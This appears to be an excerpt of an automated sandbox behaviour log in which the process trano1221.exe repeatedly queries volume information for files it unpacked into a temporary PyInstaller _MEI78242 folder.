                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\wheel-0.24.0.dist-info VolumeInformation
